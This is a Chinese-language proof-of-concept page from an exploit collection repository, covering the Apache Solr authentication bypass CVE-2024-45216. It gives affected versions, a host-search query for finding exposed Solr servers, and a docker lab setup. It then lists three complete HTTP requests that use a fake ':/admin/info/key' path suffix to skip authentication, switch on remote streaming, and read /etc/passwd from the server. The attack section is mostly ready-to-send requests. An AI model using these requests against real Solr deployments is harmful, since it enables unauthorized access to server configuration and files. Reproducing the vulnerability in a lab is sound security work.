admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/中间件漏洞/Apache Solr 认证绕过漏洞 CVE-2024-45216.md

101 lines
3.2 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# Apache Solr 认证绕过漏洞 CVE-2024-45216
## 漏洞描述
2024 年 10 月Apache Solr 官方披露 CVE-2024-45216 Apache Solr 认证绕过漏洞。攻击者可构造恶意请求利用 PKIAuthenticationPlugin 造成权限绕过,从而可在未认证的情况下调用。官方已发布安全更新,建议升级至最新版本。
参考链接:
- https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
## 漏洞影响
```
5.3.0 <= Apache Solr < 8.11.4
9.0.0 <= Apache Solr < 9.7.0
```
## 网络测绘
```
app="APACHE-Solr"
```
## 环境搭建
docker-compose.yml
```
version: '2'
services:
solr:
image: vulhub/solr:8.2.0
ports:
- "8983:8983"
- "5005:5005"
```
执行如下命令启动一个 Apache Solr 8.2.0 服务器:
```
docker-compose up -d
```
服务启动后,访问 `http://your-ip:8983` 即可查看到一个无需权限的 Apache Solr 服务。
## 漏洞复现
绕过身份验证,获取 core 名称:
```
GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105160749641.png)
此时读取文件将报错 `Remote Streaming is disabled`,这是因为 Remote streaming 是默认关闭的:
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161407187.png)
修改 core 配置,开启 Remote streaming
```
POST /solr/demo/config:/admin/info/key HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 80
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
```
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161313234.png)
读取文件,例如 `/etc/passwd`
```
GET /solr/demo/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161237958.png)
## 漏洞修复
官方已发布修复方案,受影响的用户建议更新至安全版本: https://solr.apache.org/downloads.html
Reference in New Issue Copy Permalink